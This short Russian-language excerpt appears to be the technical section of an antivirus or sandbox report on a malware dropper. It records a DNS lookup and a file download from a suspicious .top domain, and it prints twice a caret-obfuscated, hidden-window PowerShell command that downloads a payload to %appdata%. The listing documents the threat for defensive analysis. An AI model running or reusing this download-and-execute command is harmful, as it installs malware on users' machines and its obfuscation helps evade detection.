Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^WE^RsHeLL^.^E^Xe^ -EXecuTi^ON^pO^liCY b^yPas^s -nOPR^OFi^L^e -WI^Ndo^W^STYLe ^Hi^DdEn (^ne^w^-oBJ^eCt Sy^Ste^m^.Net.^wE^b^clIeNT).D^ow^nLO^ADfi^Le(^'http://sutraponef.top/read...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pO^WE^RsHeLL^.^E^Xe^ -EXecuTi^ON^pO^liCY b^yPas^s -nOPR^OFi^L^e -WI^Ndo^W^STYLe ^Hi^DdEn (^ne^w^-oBJ^eCt Sy^Ste^m^.Net.^wE^b^clIeNT).D^ow^nLO^ADfi^Le(^'http://sutraponef.top/read...' (со скрытым окном)